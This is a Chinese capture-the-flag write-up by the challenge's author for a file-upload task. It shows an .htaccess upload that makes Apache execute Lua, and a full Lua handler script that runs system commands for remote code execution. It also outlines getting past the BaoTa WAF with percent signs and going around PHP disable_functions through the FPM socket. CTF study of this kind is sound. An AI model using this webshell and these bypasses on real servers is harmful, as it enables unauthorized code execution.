朝花夕拾,自己出的题,发一发。
难度:
简单
知识点:
- 方法一:.htaccess 上传绕过
- 方法一:Lua 基本语法 bypass disable_function
- 方法二:宝塔 Apache WAF 绕过
- 方法二:FPM bypass disable_function
说明:
本题有两种解法。
一种是预期解也就是利用上传 .htaccess 和 lua 文件,使 lua 文件被解析从而造成RCE。
还有一种是通过百分号 % 绕过 WAF 上传 php,然后去攻击 tmp 目录下的 sock 绕过 disable_function。
复现环境
http://newupload.xhlj.wetolink.com/
步骤:
此处主要介绍预期解的方法一。
1. 直接构造一个 .htaccess 上传,使 lua 能被解析。
SetHandler lua-script
2. 再去网上找一个 lua 的脚本,改一改。利用 lua 来执行系统命令。
require "string"
--[[
This is the default method name for Lua handlers, see the optional
function-name in the LuaMapHandler directive to choose a different
entry point.
--]]
function handle(r)
r.content_type = "text/plain"
if r.method == 'GET' then
local t = io.popen('/readflag')
local a = t:read("*all")
r:puts(a)
for k, v in pairs( r:parseargs() ) do
r:puts( string.format("%s: %s\n", k, v) )
end
elseif r.method == 'POST' then
r:puts("Hello Lua World!\n")
for k, v in pairs( r:parsebody() ) do
r:puts( string.format("%s: %s\n", k, v) )
end
elseif r.method == 'PUT' then
-- use our own Error contents
r:puts("Unsupported HTTP method " .. r.method)
r.status = 405
return apache2.OK
else
-- use the ErrorDocument
return 501
end
return apache2.OK
end
其中这一段是关键。
local t = io.popen('/readflag')
local a = t:read("*all")
r:puts(a)
让 lua 执行系统命令 /readflag 并获取回显,需要执行其他命令则修改其中的命令。
3.最后访问这个lua 文件即可执行命令获得 flag。
/sandbox/9va7eogj0ov17g4van3lp3hel1/upload/glzjin.lua